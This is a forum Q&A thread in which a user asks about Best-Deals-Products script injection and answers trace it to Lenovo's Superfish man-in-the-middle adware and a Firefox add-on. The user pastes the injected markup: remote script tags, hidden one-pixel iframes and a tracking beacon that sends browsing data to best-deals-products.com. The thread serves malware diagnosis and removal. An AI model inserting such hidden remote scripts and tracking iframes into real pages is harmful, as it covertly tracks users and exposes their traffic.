What is Best-Deals-Products and is it malware?

6

2

I have found something that I suspects to be malware/addware. Script is added in every website I visit, even once I made myself. This is added in the : http://puu.sh/dgIF0/0c452eb390.png and iFrames are created in the body (http://puu.sh/dgJf3/c700693208.png). I checked some of it, followed the links and noticed that it collects meta-data and uploads it to the internet. (a piece of the code: http://puu.sh/dgIJE/3c53d5b1cc.png with this code there was also a error). I can't find a lot of (useful) information about Best-Deal-Products on the internet, (hence this message). Also, when I use Internet Explore or Google chrome portable (instead of the "normal" Google chrome) it is there again. Programs as JunkwareRemovalTool didn't solve the problem (if it actually is a problem). about my system: I use advast! (free), i have a windows8 64 bits OS, and there is Lenova stuff. the problem does not occur when opening html files from my computer, only html files from the internet. Also it appears that it doesn't matter what network I use. I made a blank php file and uploaded it on 000webhost. When looking at the source-code there is only this in the head: <script src="https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc"></script> but when using "inspect element" a lot of code that is not mine is shown (beside the 000webhost code), the elements are in the attachment. the following is also in the attachment: the urls from Best-Deal-Products found within the tag and a console log from google chrome when visiting google.nl

My main questions are: What is Best-Deal-Products? What does it do? Has it any kind of negative effect for me? If yes, what can I do about it? I hope I gave enough information, but in case not; ask and I will try to find it (or a TeamViewer session?) I also requested help from avast! and VirusTotal.

Attachment:

links in the tags

https://www.best-deals-products.com/ws/sf_preloader.jsp?dlsource=hdrykzc&ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/sf_code.jsp?dlsource=hdrykzc&ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/slideup2/main.js?ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/side_slider/main.js?ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/js/base_single_icon.js?ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/css/main.css?v=2014.12.4.3.1

links in the tags:

https://www.best-deals-products.com/ws/userData.jsp?dlsource=hdrykzc&userid=&ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/co/register_server_layer.html?version=2014.12.4.3.1

log from google chrome when visiting google.nl

Resource interpreted as Script but transferred with MIME type text/html: "https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc".
sf_main.jsp?dlsource=hdrykzc:322 Uncaught TypeError: Cannot read property 'appendChild' of null
(index):4 Resource interpreted as Script but transferred with MIME type text/html: "https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc".
Resource interpreted as Image but transferred with MIME type text/javascript: "https://www.best-deals-products.com/ws/tu.action?userId=fa8fa52b-c827-d5d4-…d8615-d4a&referrer=&page_url=https%3A%2F%2Fwww.google.nl%2F%3Fgws_rd%3Dssl".
frame?sourceid=1&hl=nl&origin=https%3A%2F%2Fwww.google.nl&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%…:1 Refused to load the script 'https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc' because it violates the following Content Security Policy directive: "script-src 'unsafe-inline' 'unsafe-eval' 'self' https://*.googleapis.com https://*.gstatic.com https://apis.google.com https://www.google-analytics.com https://www.googletagmanager.com https://*.talkgadget.google.com https://pagead2.googleadservices.com https://pagead2.googlesyndication.com https://tpc.googlesyndication.com https://s.ytimg.com https://www.youtube.com https://clients1.google.com https://www.google.com".

Elements in my "blank" php file hosted on 000webhost:

    <html><head><script src="https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc"></script><style type="text/css"></style><script type="text/javascript" src="http://www.best-deals-products.com/ws/sf_preloader.jsp?dlsource=hdrykzc&amp;ver=2014.12.4.4.1"></script><script type="text/javascript" src="http://www.best-deals-products.com/ws/sf_code.jsp?dlsource=hdrykzc&amp;ver=2014.12.4.4.1"></script><script type="text/javascript" src="http://www.best-deals-products.com/ws/slideup2/main.js?ver=2014.12.4.4.1"></script><script type="text/javascript" src="http://www.best-deals-products.com/ws/side_slider/main.js?ver=2014.12.4.4.1"></script><script type="text/javascript" src="http://www.best-deals-products.com/ws/js/base_single_icon.js?ver=2014.12.4.4.1"></script><link rel="stylesheet" href="http://www.best-deals-products.com/ws/css/main.css?v=2014.12.4.4.1"></head>
    <body>
    <div>

        </div>


<!-- Hosting24 Analytics Code -->
<!-- End Of Analytics Code --><script type="text/javascript" src="http://stats.hosting24.com/count.php"></script>

<iframe src="http://www.best-deals-products.com/ws/userData.jsp?dlsource=hdrykzc&amp;userid=&amp;ver=2014.12.4.4.1" style="position: absolute; top: -100px; left: -100px; z-index: -10; border: none; visibility: hidden; width: 1px; height: 1px;"></iframe><iframe src="https://www.best-deals-products.com/ws/co/register_server_layer.html?version=2014.12.4.4.1" style="position: absolute; width: 1px; height: 1px; left: -100px; top: -100px; visibility: hidden;"></iframe><iframe style="position: absolute; width: 1px; height: 1px; top: 0px; left: 0px; visibility: hidden;"></iframe><sfmsg id="sfMsgId" data="{&quot;imageCount&quot;:0,&quot;ip&quot;:&quot;1.1.1.1&quot;}"></sfmsg></body></html>

Eadorimthryth

Posted 2014-12-05T09:12:26.950

Reputation: 63

go to chrome Settings and click on extensions and see is there any unknown extension is running if yes then simply remove those extensions. – Ali786 – 2014-12-05T09:17:57.673

@ali786 This is bad advise. Google best-deals-products remove and you'll see this is serious adware that needs thorough cleaning to get rid of. – LPChip – 2014-12-05T10:35:11.723

Take a look at this answer to the question How can I remove malicious spyware, malware, viruses or rootkits from my PC?.

– CharlieRB – 2014-12-05T12:35:26.573

@ali786 I don't have any extensions installed, – Eadorimthryth – 2014-12-05T13:51:25.110

@LPChip I don't get any pop-ups or ads, I didn't notice anything off with chrome, the google results that I get are all concerning pop-ups, ads and divs from best-deals-products and not about what it does with me (sending META data). – Eadorimthryth – 2014-12-05T13:53:31.760

1@CharlieRB I tried it (putting everything new on my laptop, it's only two weeks old)I went to madiamarkt to get a new clean version of Windows8.1, I'd put the disk in and ran it. Rebooted the computer, re-installed only that of which I knew it wouldn't contain the malware (official stuff like steam, office, brackets, origin) and only from official links. it didn't work, so I checked the home network again (but since other computers don't have this I eliminated this possibility) I also checked and spoke with the people from school about the schoolnetwork, no problem (tho many others) – Eadorimthryth – 2014-12-05T14:05:40.897

Sounds like it may be "bloat-ware" from the manufacturer. :-( – CharlieRB – 2014-12-05T17:56:23.300

@CharlieRB But wouldn't I have found more information about best-deals if it were? But if it is bloarware it is harmless, right? – Eadorimthryth – 2014-12-06T14:13:41.577

A sort of a solution; add the url from best-deals-products to the adware filter. It doesn't remove the the source of the problem, but it does remove its effects. – Eadorimthryth – 2015-01-13T21:08:37.967

1

This is not harmless. See these instructions for how to remove the attack man-in-the-middle certificate from your system.

– Yakk – 2015-02-19T14:01:38.010

Answers

6

It has been revealed that many of the Lenovo computers are shipped with a software called "Superfish" which performs man-in-the-middle attack on all HTTP, and even secure HTTPS request using a self-signed SSL certificate. Among other things, Superfish injects javascript from best-deals-products.com into every loaded web page.

Furthermore, thanks to the ignorance of the company behind it, the private key included has already been extracted, ready to be used in public to intercept any HTTPS traffic coming from a Lenovo computer.

That means, even for banking or transactions, any attacker can read the supposedly secure content by sniffing your Wi-Fi signal. This is a very hazardous situation.

There was a case that, by using a web based IDE like JS Bin to write code, download the file and upload it to the hosting server, the script was spread to other people even who are not using a Lenovo computer.

You can check out the full details including if you're vulnerable here. You might also want to look at Lenovo's official statement regarding Superfish, their security advisory regarding the vulnerability, and their suggested removal instructions.

kiding

Posted 2014-12-05T09:12:26.950

Reputation: 176

Thanks for the links. However it should be noted that there was still an issue even after removing the superfish program. I haven't tried anything for a while now (adding the urls to adblock worked well), but it seems that the malware has been removed by windows, lenovo or an other party – Eadorimthryth – 2015-02-25T12:41:41.460

3

What is Best-Deal-Products? What does it do?

When you go online shopping it displays adds of similar products with their listed prices from elsewhere around the web. I think the intent is to help you find cheaper prices for things. It's also very possible that it does other things secretly.

Has it any kind of negative effect for me?

More ads is a negative for me. Also I don't trust it not to be doing something evil behind my back.

If yes, what can I do about it?

This will probably differ from case to case. In my case it came with my computer. It went away after uninstalling "Lenovo Experience Improvement", though I made a few other changes as well. It may have been related to Pokki, or possibly something else.

Alan Trick

Posted 2014-12-05T09:12:26.950

Reputation: 31

It isn't the "Lenovo Experience Improvement" or the Pokki. I got help from Avast!, but they couldn't find it either. Thanks for the help anyway. – Eadorimthryth – 2015-01-13T21:05:02.157

0

it's not just lenovo, some browser addons include javascript from superfish, one the I can think off is Youtube Downloader 4K - Video Downloader https://addons.mozilla.org/en-US/firefox/addon/media-downloader/ it has almost 160 000 users, you can open it's xpi and see a file called superfish.js, by examining it's content you can see where best-deals-products.com came from. If you have that add-on remove it there are better and clean alternatives, there are other free-ware addons that do the same, be careful what you install.

guest

Posted 2014-12-05T09:12:26.950

Reputation: 1

-1

Fixed.

I don't have a Lenovo PC and the superfish malware was not installed. In my case the problem lied with a firefox addon called Youtube Downloader 4K - Video Downloader (or something similar) I found out by using RequestPolicy. On almost every site I visit bestdealsproduct.com wanted to inject code. The helpful answer by removing the following addon helped; Youtube Downloader 4K - Video Downloader. Remove the addon and you're fine.

Optimus

Posted 2014-12-05T09:12:26.950

Reputation: 1

1This is pretty much a repeat of the answer by "guest" and doesn't add anything else of value. – Jamal – 2015-08-17T00:29:01.367

Asked: 2014-12-05T09:12:26.950

Viewed: 6 429 times

Active: 2015-08-16T23:25:06.347